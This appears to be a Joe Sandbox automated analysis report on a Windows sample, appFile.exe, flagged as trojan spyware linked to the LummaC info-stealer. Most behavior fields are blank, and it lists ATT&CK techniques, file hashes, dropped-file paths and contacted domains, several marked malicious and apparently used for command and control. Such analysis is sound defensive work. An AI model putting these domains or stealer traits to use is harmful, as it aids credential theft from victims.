Source: | Key value queried: | Jump to behavior |
Source: | Process created: |
Source: | Window detected: |
Source: | File opened: | Jump to behavior |
Source: | Static file information: |
Source: | Static PE information: |
Source: | Binary string: | ||
Source: | Binary string: | ||
Source: | Binary string: | ||
Source: | Binary string: | ||
Source: | Binary string: | ||
Source: | Binary string: | ||
Source: | Binary string: | ||
Source: | Binary string: | ||
Source: | Binary string: | ||
Source: | Binary string: | ||
Source: | Binary string: | ||
Source: | Binary string: | ||
Source: | Binary string: | ||
Source: | Binary string: | ||
Source: | Binary string: | ||
Source: | Binary string: | ||
Source: | Binary string: | ||
Source: | Binary string: | ||
Source: | Binary string: | ||
Source: | Binary string: | ||
Source: | Binary string: | ||
Source: | Binary string: | ||
Source: | Binary string: | ||
Source: | Binary string: | ||
Source: | Binary string: | ||
Source: | Binary string: | ||
Source: | Binary string: | ||
Source: | Binary string: | ||
Source: | Binary string: | ||
Source: | Binary string: | ||
Source: | Binary string: | ||
Source: | Binary string: | ||
Source: | Binary string: | ||
Source: | Binary string: | ||
Source: | Binary string: | ||
Source: | Binary string: | ||
Source: | Binary string: | ||
Source: | Binary string: | ||
Source: | Binary string: | ||
Source: | Binary string: | ||
Source: | Binary string: | ||
Source: | Binary string: | ||
Source: | Binary string: | ||
Source: | Binary string: | ||
Source: | Binary string: |
Data Obfuscation |
---|
Source: | Process created: | |||
Source: | Process created: | Jump to behavior |
Source: | Code function: | 0_2_004062FC |
Source: | Code function: | 16_2_009C3ADA | |
Source: | Code function: | 16_2_009C3CD1 | |
Source: | Code function: | 16_2_009C3CD1 |
Persistence and Installation Behavior |
---|
Source: | File created: | Jump to dropped file |
Source: | File created: | Jump to dropped file |
Source: | Registry key monitored for changes: | Jump to behavior | ||
Source: | Registry key monitored for changes: | Jump to behavior |
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior |
Malware Analysis System Evasion |
---|
Source: | WMI Queries: |
Source: | System information queried: | Jump to behavior |
Source: | Thread delayed: | Jump to behavior | ||
Source: | Thread delayed: | Jump to behavior |
Source: | Window / User API: | Jump to behavior | ||
Source: | Window / User API: | Jump to behavior |
Source: | Thread sleep time: | Jump to behavior | ||
Source: | Thread sleep time: | Jump to behavior | ||
Source: | Thread sleep count: | Jump to behavior | ||
Source: | Thread sleep count: | Jump to behavior | ||
Source: | Thread sleep time: | Jump to behavior | ||
Source: | Thread sleep time: | Jump to behavior | ||
Source: | Thread sleep time: | Jump to behavior |
Source: | WMI Queries: |
Source: | Last function: |
Source: | Code function: | 0_2_004062D5 | |
Source: | Code function: | 0_2_00402E18 | |
Source: | Code function: | 0_2_00406C9B |
Source: | Thread delayed: | Jump to behavior | ||
Source: | Thread delayed: | Jump to behavior |
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior |
Source: | Binary or memory string: | ||
Source: | Binary or memory string: | ||
Source: | Binary or memory string: | ||
Source: | Binary or memory string: | ||
Source: | Binary or memory string: | ||
Source: | Binary or memory string: | ||
Source: | Binary or memory string: | ||
Source: | Binary or memory string: | ||
Source: | Binary or memory string: | ||
Source: | Binary or memory string: | ||
Source: | Binary or memory string: | ||
Source: | Binary or memory string: | ||
Source: | Binary or memory string: | ||
Source: | Binary or memory string: | ||
Source: | Binary or memory string: | ||
Source: | Binary or memory string: | ||
Source: | Binary or memory string: | ||
Source: | Binary or memory string: | ||
Source: | Binary or memory string: | ||
Source: | Binary or memory string: | ||
Source: | Binary or memory string: | ||
Source: | Binary or memory string: | ||
Source: | Binary or memory string: | ||
Source: | Binary or memory string: | ||
Source: | Binary or memory string: | ||
Source: | Binary or memory string: | ||
Source: | Binary or memory string: | ||
Source: | Binary or memory string: | ||
Source: | Binary or memory string: | ||
Source: | Binary or memory string: | ||
Source: | Binary or memory string: | ||
Source: | Binary or memory string: |
Source: | Process information queried: | Jump to behavior |
Source: | Code function: | 0_2_004062FC |
Source: | Process token adjusted: | Jump to behavior | ||
Source: | Process token adjusted: | Jump to behavior | ||
Source: | Process token adjusted: | Jump to behavior |
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior |
Source: | Process created: | |||
Source: | Process created: | Jump to behavior |
Source: | Binary or memory string: | ||
Source: | Binary or memory string: | ||
Source: | Binary or memory string: |
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior |
Source: | Code function: | 0_2_00406805 |
Source: | Binary or memory string: | ||
Source: | Binary or memory string: | ||
Source: | Binary or memory string: | ||
Source: | Binary or memory string: |
Source: | WMI Queries: |
Stealing of Sensitive Information |
---|
Source: | File source: |
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior |
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior |
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior |
Source: | Directory queried: | Jump to behavior | ||
Source: | Directory queried: | Jump to behavior | ||
Source: | Directory queried: | Jump to behavior | ||
Source: | Directory queried: | Jump to behavior | ||
Source: | Directory queried: | Jump to behavior | ||
Source: | Directory queried: | Jump to behavior | ||
Source: | Directory queried: | Jump to behavior | ||
Source: | Directory queried: | Jump to behavior | ||
Source: | Directory queried: | Jump to behavior | ||
Source: | Directory queried: | Jump to behavior | ||
Source: | Directory queried: | Jump to behavior | ||
Source: | Directory queried: | Jump to behavior | ||
Source: | Directory queried: | Jump to behavior | ||
Source: | Directory queried: | Jump to behavior |
Remote Access Functionality |
---|
Source: | File source: |
Reconnaissance | Resource Development | Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Command and Control | Exfiltration | Impact |
---|---|---|---|---|---|---|---|---|---|---|---|---|---|
Gather Victim Identity Information | 1 Scripting | Valid Accounts | 121 Windows Management Instrumentation | 1 Scripting | 1 DLL Side-Loading | 1 Deobfuscate/Decode Files or Information | 2 OS Credential Dumping | 13 File and Directory Discovery | Remote Services | 1 Archive Collected Data | 3 Ingress Tool Transfer | Exfiltration Over Other Network Medium | 1 System Shutdown/Reboot |
Credentials | Domains | Default Accounts | 1 Native API | 1 DLL Side-Loading | 12 Process Injection | 2 Obfuscated Files or Information | 11 Input Capture | 24 System Information Discovery | Remote Desktop Protocol | 31 Data from Local System | 11 Encrypted Channel | Exfiltration Over Bluetooth | Network Denial of Service |
Email Addresses | DNS Server | Domain Accounts | 12 Command and Scripting Interpreter | Logon Script (Windows) | Logon Script (Windows) | 1 DLL Side-Loading | Security Account Manager | 1 Query Registry | SMB/Windows Admin Shares | 11 Input Capture | 4 Non-Application Layer Protocol | Automated Exfiltration | Data Encrypted for Impact |
Employee Names | Virtual Private Server | Local Accounts | 1 PowerShell | Login Hook | Login Hook | 111 Masquerading | NTDS | 221 Security Software Discovery | Distributed Component Object Model | 1 Clipboard Data | 15 Application Layer Protocol | Traffic Duplication | Data Destruction |
Gather Victim Network Information | Server | Cloud Accounts | Launchd | Network Logon Script | Network Logon Script | 221 Virtualization/Sandbox Evasion | LSA Secrets | 3 Process Discovery | SSH | Keylogging | Fallback Channels | Scheduled Transfer | Data Encrypted for Impact |
Domain Properties | Botnet | Replication Through Removable Media | Scheduled Task | RC Scripts | RC Scripts | 12 Process Injection | Cached Domain Credentials | 221 Virtualization/Sandbox Evasion | VNC | GUI Input Capture | Multiband Communication | Data Transfer Size Limits | Service Stop |
DNS | Web Services | External Remote Services | Systemd Timers | Startup Items | Startup Items | Compile After Delivery | DCSync | 1 Application Window Discovery | Windows Remote Management | Web Portal Capture | Commonly Used Port | Exfiltration Over C2 Channel | Inhibit System Recovery |
This section contains all screenshots as thumbnails, including those not shown in the slideshow.
Source | Detection | Scanner | Label | Link |
---|---|---|---|---|
17% | Virustotal | Browse | ||
16% | ReversingLabs | Win32.Trojan.Generic |
Source | Detection | Scanner | Label | Link |
---|---|---|---|---|
0% | ReversingLabs | |||
0% | ReversingLabs |
Source | Detection | Scanner | Label | Link |
---|---|---|---|---|
0% | Avira URL Cloud | safe | ||
100% | Avira URL Cloud | malware | ||
100% | Avira URL Cloud | malware | ||
100% | Avira URL Cloud | malware | ||
0% | Avira URL Cloud | safe | ||
0% | Avira URL Cloud | safe | ||
0% | Avira URL Cloud | safe | ||
0% | Avira URL Cloud | safe | ||
0% | Avira URL Cloud | safe | ||
0% | Avira URL Cloud | safe | ||
0% | Avira URL Cloud | safe | ||
0% | Avira URL Cloud | safe | ||
0% | Avira URL Cloud | safe |
Name | IP | Active | Malicious | Antivirus Detection | Reputation |
---|---|---|---|---|---|
cegu.shop | 185.161.251.21 | true | false | high | |
steamcommunity.com | 104.102.49.254 | true | false | high | |
sputnik-1985.com | 104.21.80.1 | true | false | high | |
klipgonuh.shop | 104.21.15.122 | true | false | unknown | |
breathauthorit.cyou | unknown | unknown | true | unknown | |
robinsharez.shop | unknown | unknown | true | unknown | |
versersleep.shop | unknown | unknown | true | unknown | |
chipdonkeruz.shop | unknown | unknown | true | unknown | |
femalsabler.shop | unknown | unknown | true | unknown | |
soundtappysk.shop | unknown | unknown | true | unknown | |
crowdwarek.shop | unknown | unknown | true | unknown | |
jdvjdvWSlp.jdvjdvWSlp | unknown | unknown | true | unknown | |
dfgh.online | unknown | unknown | false | high | |
apporholis.shop | unknown | unknown | true | unknown | |
handscreamny.shop | unknown | unknown | true | unknown |
Name | Malicious | Antivirus Detection | Reputation |
---|---|---|---|
true |
| unknown | |
false |
| unknown | |
false | high | ||
false | high |
Name | Source | Malicious | Antivirus Detection | Reputation |
---|---|---|---|---|
false | high | |||
false | high | |||
false | high | |||
false |
| unknown | ||
false | high | |||
false | high | |||
false | high | |||
false |
| unknown | ||
false | high | |||
false |
| unknown | ||
false | high | |||
false | high | |||
false |
| unknown | ||
false | high | |||
false |
| unknown | ||
false | high | |||
false | high | |||
false | high | |||
false | high | |||
false | high | |||
false | high | |||
false |
| unknown | ||
false | high | |||
false | high | |||
false | high | |||
false | high | |||
false | high | |||
false | high | |||
false | high | |||
false |
| unknown | ||
false | high | |||
false | high | |||
false | high | |||
false | high | |||
false | high | |||
false | high | |||
false | high | |||
false | high | |||
false | high | |||
false | high | |||
false | high | |||
false | high | |||
false | high | |||
false | high | |||
false | high | |||
false | high | |||
false | high | |||
false | high | |||
false | high | |||
false | high | |||
false | high | |||
false | high | |||
false | high | |||
false | high | |||
false | high | |||
false |
| unknown | ||
false | high | |||
false | high | |||
false |
| unknown | ||
false |
| unknown | ||
false | high | |||
false | high | |||
false | high | |||
false | high | |||
false | high | |||
false | high | |||
false |
| unknown | ||
false | high |
- No. of IPs < 25%
- 25% < No. of IPs < 50%
- 50% < No. of IPs < 75%
- 75% < No. of IPs
IP | Domain | Country | Flag | ASN | ASN Name | Malicious |
---|---|---|---|---|---|---|
104.21.15.122 | klipgonuh.shop | United States | 13335 | CLOUDFLARENETUS | false | |
185.161.251.21 | cegu.shop | United Kingdom | 5089 | NTLGB | false | |
104.102.49.254 | steamcommunity.com | United States | 16625 | AKAMAI-ASUS | false | |
104.21.80.1 | sputnik-1985.com | United States | 13335 | CLOUDFLARENETUS | false |
Joe Sandbox version: | 42.0.0 Malachite |
Analysis ID: | 1587422 |
Start date and time: | 2025-01-10 11:15:15 +01:00 |
Joe Sandbox product: | CloudBasic |
Overall analysis duration: | 0h 6m 41s |
Hypervisor based Inspection enabled: | false |
Report type: | full |
Cookbook file name: | default.jbs |
Analysis system description: | Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01 |
Number of analysed new started processes analysed: | 19 |
Number of new started drivers analysed: | 0 |
Number of existing processes analysed: | 0 |
Number of existing drivers analysed: | 0 |
Number of injected processes analysed: | 0 |
Technologies: |
|
Analysis Mode: | default |
Analysis stop reason: | Timeout |
Sample name: | appFile.exe |
Detection: | MAL |
Classification: | mal100.troj.spyw.evad.winEXE@30/27@15/4 |
EGA Information: |
|
HCA Information: |
|
Cookbook Comments: |
|
- Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe
- Excluded IPs from analysis (whitelisted): 13.107.246.45, 4.175.87.197
- Excluded domains from analysis (whitelisted): ocsp.digicert.com, otelrules.azureedge.net, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
- Execution Graph export aborted for target powershell.exe, PID 4836 because it is empty
- Not all processes where analyzed, report is missing behavior information
- Report size exceeded maximum capacity and may have missing behavior information.
- Report size getting too big, too many NtOpenKeyEx calls found.
- Report size getting too big, too many NtQueryValueKey calls found.
- Report size getting too big, too many NtSetInformationFile calls found.
- Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
Time | Type | Description |
---|---|---|
05:16:08 | API Interceptor | |
05:16:13 | API Interceptor | |
05:16:36 | API Interceptor |
Match | Associated Sample Name / URL | SHA 256 | Detection | Threat Name | Link | Context |
---|---|---|---|---|---|---|
185.161.251.21 | Get hash | malicious | LummaC | Browse | ||
Get hash | malicious | LummaC | Browse | |||
Get hash | malicious | LummaC | Browse | |||
Get hash | malicious | LummaC | Browse | |||
Get hash | malicious | LummaC | Browse | |||
Get hash | malicious | LummaC | Browse | |||
Get hash | malicious | LummaC | Browse | |||
Get hash | malicious | LummaC | Browse | |||
Get hash | malicious | LummaC | Browse | |||
104.102.49.254 | Get hash | malicious | Socks5Systemz | Browse |
| |
Get hash | malicious | Unknown | Browse |
| ||
104.21.80.1 | Get hash | malicious | Amadey | Browse |
| |
Get hash | malicious | Unknown | Browse |
| ||
Get hash | malicious | FormBook | Browse |
| ||
Get hash | malicious | CMSBrute | Browse |
| ||
Get hash | malicious | XWorm | Browse |
|
Match | Associated Sample Name / URL | SHA 256 | Detection | Threat Name | Link | Context |
---|---|---|---|---|---|---|
cegu.shop | Get hash | malicious | LummaC | Browse |
| |
Get hash | malicious | LummaC | Browse |
| ||
Get hash | malicious | LummaC | Browse |
| ||
Get hash | malicious | LummaC | Browse |
| ||
Get hash | malicious | LummaC | Browse |
| ||
Get hash | malicious | LummaC | Browse |
| ||
Get hash | malicious | LummaC | Browse |
| ||
Get hash | malicious | LummaC | Browse |
| ||
Get hash | malicious | LummaC | Browse |
| ||
steamcommunity.com | Get hash | malicious | LummaC Stealer | Browse |
| |
Get hash | malicious | LummaC | Browse |
| ||
Get hash | malicious | LummaC | Browse |
| ||
Get hash | malicious | LummaC Stealer | Browse |
| ||
Get hash | malicious | LummaC | Browse |
| ||
Get hash | malicious | LummaC | Browse |
| ||
Get hash | malicious | LummaC | Browse |
| ||
Get hash | malicious | LummaC | Browse |
| ||
Get hash | malicious | LummaC | Browse |
| ||
Get hash | malicious | LummaC, PureLog Stealer | Browse |
| ||
sputnik-1985.com | Get hash | malicious | LummaC | Browse |
| |
Get hash | malicious | LummaC, PureLog Stealer | Browse |
| ||
Get hash | malicious | LummaC | Browse |
| ||
Get hash | malicious | LummaC, PrivateLoader | Browse |
| ||
Get hash | malicious | Amadey, Babadeda, LummaC Stealer, Poverty Stealer, PureLog Stealer | Browse |
| ||
Get hash | malicious | LummaC | Browse |
|
Match | Associated Sample Name / URL | SHA 256 | Detection | Threat Name | Link | Context |
---|---|---|---|---|---|---|
CLOUDFLARENETUS | Get hash | malicious | Unknown | Browse |
| |
Get hash | malicious | Blank Grabber | Browse |
| ||
Get hash | malicious | XWorm | Browse |
| ||
Get hash | malicious | GRQ Scam | Browse |
| ||
Get hash | malicious | CredGrabber, Meduza Stealer | Browse |
| ||
Get hash | malicious | Unknown | Browse |
| ||
Get hash | malicious | DarkTortilla, Snake Keylogger, VIP Keylogger | Browse |
| ||
Get hash | malicious | Unknown | Browse |
| ||
Get hash | malicious | CAPTCHA Scam ClickFix | Browse |
| ||
Get hash | malicious | Unknown | Browse |
| ||
NTLGB | Get hash | malicious | Unknown | Browse |
| |
Get hash | malicious | Unknown | Browse |
| ||
Get hash | malicious | Unknown | Browse |
| ||
Get hash | malicious | Unknown | Browse |
| ||
Get hash | malicious | Unknown | Browse |
| ||
Get hash | malicious | Unknown | Browse |
| ||
Get hash | malicious | Unknown | Browse |
| ||
Get hash | malicious | Mirai | Browse |
| ||
Get hash | malicious | LummaC | Browse |
| ||
AKAMAI-ASUS | Get hash | malicious | LummaC Stealer | Browse |
| |
Get hash | malicious | Unknown | Browse |
| ||
Get hash | malicious | Unknown | Browse |
| ||
Get hash | malicious | Unknown | Browse |
| ||
Get hash | malicious | Unknown | Browse |
| ||
Get hash | malicious | Unknown | Browse |
| ||
Get hash | malicious | Unknown | Browse |
| ||
Get hash | malicious | LummaC | Browse |
| ||
Get hash | malicious | Unknown | Browse |
| ||
Get hash | malicious | Unknown | Browse |
|
Match | Associated Sample Name / URL | SHA 256 | Detection | Threat Name | Link | Context |
---|---|---|---|---|---|---|
a0e9f5d64349fb13191bc781f81f42e1 | Get hash | malicious | LummaC Stealer | Browse |
| |
Get hash | malicious | Unknown | Browse |
| ||
Get hash | malicious | DBatLoader, MassLogger RAT, PureLog Stealer | Browse |
| ||
Get hash | malicious | LummaC | Browse |
| ||
Get hash | malicious | Unknown | Browse |
| ||
Get hash | malicious | Unknown | Browse |
| ||
Get hash | malicious | Unknown | Browse |
| ||
Get hash | malicious | Unknown | Browse |
| ||
Get hash | malicious | Unknown | Browse |
|
Match | Associated Sample Name / URL | SHA 256 | Detection | Threat Name | Link | Context |
---|---|---|---|---|---|---|
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\473587\Gui.com | Get hash | malicious | Remcos | Browse | ||
Get hash | malicious | Remcos | Browse | |||
Get hash | malicious | LummaC | Browse | |||
Get hash | malicious | LummaC | Browse | |||
Get hash | malicious | LummaC | Browse | |||
Get hash | malicious | Remcos | Browse | |||
Get hash | malicious | Remcos | Browse | |||
Get hash | malicious | LummaC | Browse | |||
Get hash | malicious | LummaC | Browse | |||
Get hash | malicious | LummaC | Browse |
Process: | C:\Windows\SysWOW64\cmd.exe |
File Type: | |
Category: | modified |
Size (bytes): | 947288 |
Entropy (8bit): | 6.630612696399572 |
Encrypted: | false |
SSDEEP: | 24576:uvG4FEq/TQ+Svbi3zcNjmsuENOJuM8WU2a+BYK:u9GqLQHbijkmc2umva+OK |
MD5: | 62D09F076E6E0240548C2F837536A46A |
SHA1: | 26BDBC63AF8ABAE9A8FB6EC0913A307EF6614CF2 |
SHA-256: | 1300262A9D6BB6FCBEFC0D299CCE194435790E70B9C7B4A651E202E90A32FD49 |
SHA-512: | 32DE0D8BB57F3D3EB01D16950B07176866C7FB2E737D9811F61F7BE6606A6A38A5FC5D4D2AE54A190636409B2A7943ABCA292D6CEFAA89DF1FC474A1312C695F |
Malicious: | true |
Antivirus: |
|
Joe Sandbox View: |
|
Preview: |
Process: | C:\Windows\SysWOW64\cmd.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 494128 |
Entropy (8bit): | 7.9996272012123075 |
Encrypted: | true |
SSDEEP: | 12288:WfvF3dQsz9h1mC5/06+a7BSE5GxC+4R2ld3g:0vF3dzh1Z8LuSE5cClcHw |
MD5: | B7D353F03FFF3C5542E4EFC9720349C4 |
SHA1: | 2F6B045ECE9D377097F65F5BC83B82819E42648E |
SHA-256: | 597A83A68EB6977C1BBC4307E35939D1287DA1DC79D7800FCE7485BC8A00ADD1 |
SHA-512: | 8DC1192A64E0170A39CB9BBC1B7E3E06CAA9DD8BC39EAF550A07BA5D0B482BE0EA79BB967929F93A8E9F13B6F78EB16243B01159F3AF3F70AD3195C66EAE7CE5 |
Malicious: | false |
Preview: |
Process: | C:\Users\user\Desktop\appFile.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 70192 |
Entropy (8bit): | 7.997387408606227 |
Encrypted: | true |
SSDEEP: | 1536:q2zPNxA8kAsclUB/b2siWmzlb9hCX+HWS317QqlXhW:dxA7A/2BToblBcuHp3fXY |
MD5: | 418A3987063563ADE43EB93166FD252F |
SHA1: | 44F0924BCFEEF8F9AED231C4419791DE1EDF3440 |
SHA-256: | E6381B1FFDE5768E5EB3CDB56DC8CDD0222252632812BF0E9017BC45B4FC6B59 |
